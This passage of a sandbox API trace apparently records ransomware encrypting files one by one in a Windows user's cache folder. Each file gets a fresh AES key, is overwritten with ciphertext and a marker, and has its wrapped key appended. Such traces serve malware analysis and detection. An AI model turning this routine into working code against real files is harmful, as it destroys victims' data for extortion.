lpFileSize=0x29ab138*=506) returned 1 [0144.612] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xd8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.612] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.613] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.613] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.613] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.613] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.613] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1fa, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1fa, lpOverlapped=0x0) returned 1 [0144.613] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.613] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1fa, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x200) returned 1 [0144.613] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.613] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x200, lpOverlapped=0x0) returned 1 [0144.613] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.613] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.613] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.614] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.614] CloseHandle (hObject=0x198) returned 1 [0144.630] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.634] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.634] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.634] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.634] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", dwFileAttributes=0x80) returned 1 [0144.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.635] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1660) returned 1 [0144.635] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1660) returned 1 [0144.635] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x55a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.635] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.636] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.637] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.637] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.637] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.637] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x67c, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x67c, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.637] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x67c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x680) returned 1 [0144.637] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.637] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x680, lpOverlapped=0x0) returned 1 [0144.637] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.637] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.637] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.637] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.637] CloseHandle (hObject=0x198) returned 1 [0144.661] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.665] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.665] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.666] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", dwFileAttributes=0x80) returned 1 [0144.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.667] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1763) returned 1 [0144.667] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1763) returned 1 [0144.667] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.667] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.668] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.668] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.668] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.668] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.668] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x6e3, lpOverlapped=0x0) returned 1 [0144.668] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.668] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6e3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6f0) returned 1 [0144.668] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.668] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6f0, lpOverlapped=0x0) returned 1 [0144.669] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.669] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.669] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.669] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.669] CloseHandle (hObject=0x198) returned 1 [0144.685] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.690] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.690] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.690] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.690] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.690] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", dwFileAttributes=0x80) returned 1 [0144.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.691] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1763) returned 1 [0144.691] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1763) returned 1 [0144.691] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.694] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.694] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.694] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.694] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.694] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x6e3, lpOverlapped=0x0) returned 1 [0144.694] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.694] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6e3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6f0) returned 1 [0144.694] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.695] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6f0, lpOverlapped=0x0) returned 1 [0144.695] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.695] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.695] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.695] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.695] CloseHandle (hObject=0x198) returned 1 [0144.726] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.730] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.730] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.731] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", dwFileAttributes=0x80) returned 1 [0144.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.739] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.739] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.739] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.739] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.740] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.740] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.740] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.740] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.740] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.740] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.740] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.740] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.740] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.740] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.740] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.740] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.741] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.741] CloseHandle (hObject=0x198) returned 1 [0144.757] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.761] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.761] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.762] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", dwFileAttributes=0x80) returned 1 [0144.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.763] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.763] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.763] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.763] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.764] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.764] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.764] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.764] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.764] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.764] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.764] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.764] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.764] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.765] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.765] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 